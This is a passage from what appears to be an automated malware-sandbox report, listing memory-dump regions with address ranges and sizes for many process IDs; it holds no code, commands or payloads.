                                                            • memory/540-61-0x0000000000400000-0x000000000042B000-memory.dmp
                                                              Filesize

                                                              172KB

                                                            • memory/572-115-0x0000000000000000-mapping.dmp
                                                            • memory/640-75-0x00000000002B0000-0x00000000002B2000-memory.dmp
                                                              Filesize

                                                              8KB

                                                            • memory/640-72-0x0000000000000000-mapping.dmp
                                                            • memory/652-100-0x000007FEF1C40000-0x000007FEF2CD6000-memory.dmp
                                                              Filesize

                                                              16.6MB

                                                            • memory/652-122-0x0000000000B05000-0x0000000000B06000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/652-104-0x0000000000AE0000-0x0000000000AE2000-memory.dmp
                                                              Filesize

                                                              8KB

                                                            • memory/652-119-0x000000001ADB0000-0x000000001ADC9000-memory.dmp
                                                              Filesize

                                                              100KB

                                                            • memory/652-95-0x0000000000000000-mapping.dmp
                                                            • memory/652-120-0x0000000000AE6000-0x0000000000B05000-memory.dmp
                                                              Filesize

                                                              124KB

                                                            • memory/864-148-0x0000000001840000-0x00000000018B0000-memory.dmp
                                                              Filesize

                                                              448KB

                                                            • memory/864-147-0x00000000008C0000-0x000000000090B000-memory.dmp
                                                              Filesize

                                                              300KB

                                                            • memory/936-200-0x00000000057C0000-0x00000000057C1000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/936-187-0x00000000047F0000-0x00000000047F1000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/936-202-0x0000000006340000-0x0000000006341000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/936-210-0x00000000062C0000-0x00000000062C1000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/936-212-0x00000000064E0000-0x00000000064E1000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/936-195-0x0000000005700000-0x0000000005701000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/936-189-0x00000000047B2000-0x00000000047B3000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/936-188-0x00000000047B0000-0x00000000047B1000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/936-190-0x0000000004610000-0x0000000004611000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/936-203-0x000000007EF30000-0x000000007EF31000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/936-186-0x0000000002420000-0x0000000002421000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/936-191-0x0000000005260000-0x0000000005261000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/936-184-0x0000000000000000-mapping.dmp
                                                            • memory/1096-109-0x0000000000A10000-0x0000000000A12000-memory.dmp
                                                              Filesize

                                                              8KB

                                                            • memory/1096-98-0x0000000000000000-mapping.dmp
                                                            • memory/1256-270-0x0000000004080000-0x0000000004095000-memory.dmp
                                                              Filesize

                                                              84KB

                                                            • memory/1256-266-0x0000000002240000-0x0000000002257000-memory.dmp
                                                              Filesize

                                                              92KB

                                                            • memory/1496-76-0x0000000000000000-mapping.dmp
                                                            • memory/1496-79-0x0000000000400000-0x0000000000416000-memory.dmp
                                                              Filesize

                                                              88KB

                                                            • memory/1604-107-0x00000000005C0000-0x00000000005C2000-memory.dmp
                                                              Filesize

                                                              8KB

                                                            • memory/1604-110-0x000007FEF1C40000-0x000007FEF2CD6000-memory.dmp
                                                              Filesize

                                                              16.6MB

                                                            • memory/1604-117-0x00000000005C6000-0x00000000005E5000-memory.dmp
                                                              Filesize

                                                              124KB

                                                            • memory/1604-103-0x0000000000000000-mapping.dmp
                                                            • memory/1672-82-0x0000000000000000-mapping.dmp
                                                            • memory/1672-88-0x0000000000240000-0x0000000000241000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/1672-89-0x00000000741F1000-0x00000000741F3000-memory.dmp
                                                              Filesize

                                                              8KB

                                                            • memory/1716-290-0x0000000000000000-mapping.dmp
                                                            • memory/1716-293-0x0000000000490000-0x0000000000491000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/1996-63-0x0000000000000000-mapping.dmp
                                                            • memory/1996-70-0x0000000000240000-0x0000000000241000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/2040-112-0x0000000000000000-mapping.dmp
                                                            • memory/2040-113-0x000007FEFB9A1000-0x000007FEFB9A3000-memory.dmp
                                                              Filesize

                                                              8KB

                                                            • memory/2040-114-0x0000000002040000-0x0000000002050000-memory.dmp
                                                              Filesize

                                                              64KB

                                                            • memory/2156-254-0x0000000006250000-0x0000000006251000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/2156-248-0x0000000004B30000-0x0000000004B31000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/2156-243-0x0000000004BE2000-0x0000000004BE3000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/2156-242-0x0000000004BE0000-0x0000000004BE1000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/2156-241-0x0000000004C20000-0x0000000004C21000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/2156-240-0x0000000002100000-0x0000000002101000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/2156-238-0x0000000000000000-mapping.dmp
                                                            • memory/2376-246-0x0000000000402F68-mapping.dmp
                                                            • memory/2376-245-0x0000000000400000-0x000000000040C000-memory.dmp
                                                              Filesize

                                                              48KB

                                                            • memory/2388-279-0x0000000000000000-mapping.dmp
                                                            • memory/2820-264-0x00000000053A0000-0x00000000053A1000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/2820-262-0x0000000004800000-0x0000000004801000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/2820-263-0x0000000004802000-0x0000000004803000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/2820-260-0x0000000004840000-0x0000000004841000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/2820-259-0x0000000002330000-0x0000000002331000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/2820-257-0x0000000000000000-mapping.dmp
                                                            • memory/3560-130-0x0000000000000000-mapping.dmp
                                                            • memory/3616-132-0x0000000000000000-mapping.dmp
                                                            • memory/4220-135-0x0000000000000000-mapping.dmp
                                                            • memory/4220-145-0x00000000009B0000-0x0000000000AB1000-memory.dmp
                                                              Filesize

                                                              1.0MB

                                                            • memory/4220-146-0x0000000000340000-0x000000000039C000-memory.dmp
                                                              Filesize

                                                              368KB

                                                            • memory/4220-144-0x0000000010000000-0x0000000010002000-memory.dmp
                                                              Filesize

                                                              8KB

                                                            • memory/4360-181-0x0000000002C10000-0x0000000002D0F000-memory.dmp
                                                              Filesize

                                                              1020KB

                                                            • memory/4360-143-0x00000000FFC1246C-mapping.dmp
                                                            • memory/4360-150-0x00000000004D0000-0x0000000000540000-memory.dmp
                                                              Filesize

                                                              448KB

                                                            • memory/4692-151-0x0000000000000000-mapping.dmp
                                                            • memory/4692-153-0x0000000000DE0000-0x0000000000DE2000-memory.dmp
                                                              Filesize

                                                              8KB

                                                            • memory/4848-155-0x0000000000000000-mapping.dmp
                                                            • memory/4908-157-0x0000000000000000-mapping.dmp
                                                            • memory/5076-160-0x0000000000000000-mapping.dmp
                                                            • memory/5124-162-0x0000000000000000-mapping.dmp
                                                            • memory/5276-288-0x0000000000400000-0x0000000002C30000-memory.dmp
                                                              Filesize

                                                              40.2MB

                                                            • memory/5276-287-0x0000000004590000-0x00000000046AA000-memory.dmp
                                                              Filesize

                                                              1.1MB

                                                            • memory/5276-282-0x0000000000000000-mapping.dmp
                                                            • memory/5388-166-0x0000000000000000-mapping.dmp
                                                            • memory/5444-167-0x0000000000000000-mapping.dmp
                                                            • memory/5684-267-0x00000000048A0000-0x00000000048A1000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/5684-265-0x0000000000000000-mapping.dmp
                                                            • memory/5684-268-0x00000000048A2000-0x00000000048A3000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/5856-168-0x0000000000000000-mapping.dmp
                                                            • memory/5964-170-0x0000000000000000-mapping.dmp
                                                            • memory/6032-280-0x0000000000000000-mapping.dmp
                                                            • memory/6048-174-0x0000000000000000-mapping.dmp
                                                            • memory/6120-176-0x0000000000000000-mapping.dmp
                                                            • memory/6120-179-0x0000000000240000-0x0000000000250000-memory.dmp
                                                              Filesize

                                                              64KB

                                                            • memory/6120-180-0x0000000000270000-0x0000000000282000-memory.dmp
                                                              Filesize

                                                              72KB

                                                            • memory/6136-281-0x0000000000000000-mapping.dmp
                                                            • memory/6408-283-0x0000000000000000-mapping.dmp
                                                            • memory/6408-284-0x0000000000300000-0x0000000000391000-memory.dmp
                                                              Filesize

                                                              580KB

                                                            • memory/6408-285-0x0000000000400000-0x0000000003DF0000-memory.dmp
                                                              Filesize

                                                              57.9MB

                                                            • memory/6576-292-0x0000000000300000-0x000000000036B000-memory.dmp
                                                              Filesize

                                                              428KB

                                                            • memory/6576-294-0x0000000000400000-0x00000000004F8000-memory.dmp
                                                              Filesize

                                                              992KB

                                                            • memory/6576-286-0x0000000000000000-mapping.dmp
                                                            • memory/6608-289-0x0000000000000000-mapping.dmp
                                                            • memory/6764-223-0x0000000000000000-mapping.dmp
                                                            • memory/6800-249-0x00000000003C0000-0x00000000003CC000-memory.dmp
                                                              Filesize

                                                              48KB

                                                            • memory/6800-225-0x0000000000000000-mapping.dmp
                                                            • memory/6964-228-0x0000000000000000-mapping.dmp
                                                            • memory/7072-234-0x0000000000000000-mapping.dmp
                                                            • memory/7100-302-0x0000000000000000-mapping.dmp
                                                            • memory/7100-309-0x0000000000400000-0x000000000044D000-memory.dmp
                                                              Filesize

                                                              308KB

                                                            • memory/7108-255-0x0000000000400000-0x0000000000D25000-memory.dmp
                                                              Filesize

                                                              9.1MB

                                                            • memory/7108-253-0x0000000002A30000-0x000000000333B000-memory.dmp
                                                              Filesize

                                                              9.0MB

                                                            • memory/7108-301-0x0000000000000000-mapping.dmp
                                                            • memory/7108-308-0x0000000000400000-0x000000000044D000-memory.dmp
                                                              Filesize

                                                              308KB

                                                            • memory/7108-235-0x0000000000000000-mapping.dmp
                                                            • memory/7140-252-0x0000000000220000-0x0000000000229000-memory.dmp
                                                              Filesize

                                                              36KB

                                                            • memory/7140-256-0x0000000000400000-0x00000000004A0000-memory.dmp
                                                              Filesize

                                                              640KB

                                                            • memory/7140-237-0x0000000000000000-mapping.dmp
                                                            • memory/7276-297-0x0000000000400000-0x0000000002C30000-memory.dmp
                                                              Filesize

                                                              40.2MB

                                                            • memory/7276-291-0x0000000000000000-mapping.dmp
                                                            • memory/7420-269-0x0000000000000000-mapping.dmp
                                                            • memory/7460-300-0x00000000004171EA-mapping.dmp
                                                            • memory/7484-304-0x0000000000400000-0x00000000004A5000-memory.dmp
                                                              Filesize

                                                              660KB

                                                            • memory/7484-295-0x0000000000000000-mapping.dmp
                                                            • memory/7484-303-0x0000000000220000-0x0000000000233000-memory.dmp
                                                              Filesize

                                                              76KB

                                                            • memory/7580-298-0x0000000000000000-mapping.dmp
                                                            • memory/7580-305-0x0000000000400000-0x000000000044D000-memory.dmp
                                                              Filesize

                                                              308KB

                                                            • memory/7616-299-0x0000000000000000-mapping.dmp
                                                            • memory/7716-306-0x0000000000000000-mapping.dmp
                                                            • memory/7732-307-0x0000000000000000-mapping.dmp
                                                            • memory/7788-272-0x0000000004840000-0x0000000004841000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/7788-273-0x0000000004842000-0x0000000004843000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/7788-271-0x0000000000000000-mapping.dmp
                                                            • memory/8348-201-0x0000000000000000-mapping.dmp
                                                            • memory/8348-211-0x00000000002D0000-0x0000000000330000-memory.dmp
                                                              Filesize

                                                              384KB

                                                            • memory/8560-274-0x0000000000000000-mapping.dmp
                                                            • memory/8560-277-0x0000000004762000-0x0000000004763000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/8560-276-0x0000000004760000-0x0000000004761000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/8896-123-0x0000000000000000-mapping.dmp
                                                            • memory/9092-125-0x0000000000000000-mapping.dmp
                                                            • memory/9092-129-0x0000000000200000-0x0000000000212000-memory.dmp
                                                              Filesize

                                                              72KB

                                                            • memory/9092-128-0x00000000001D0000-0x00000000001E0000-memory.dmp
                                                              Filesize

                                                              64KB

                                                            • memory/9204-215-0x0000000000000000-mapping.dmp
                                                            • memory/9204-222-0x0000000002650000-0x0000000002651000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/9204-221-0x0000000000BA2000-0x0000000000BA3000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/9204-220-0x0000000000BA0000-0x0000000000BA1000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/9204-219-0x0000000004880000-0x0000000004881000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/9204-218-0x0000000002510000-0x0000000002511000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/9204-236-0x00000000062E0000-0x00000000062E1000-memory.dmp
                                                              Filesize

                                                              4KB

                                                            • memory/9204-227-0x0000000005320000-0x0000000005321000-memory.dmp
                                                              Filesize

                                                              4KB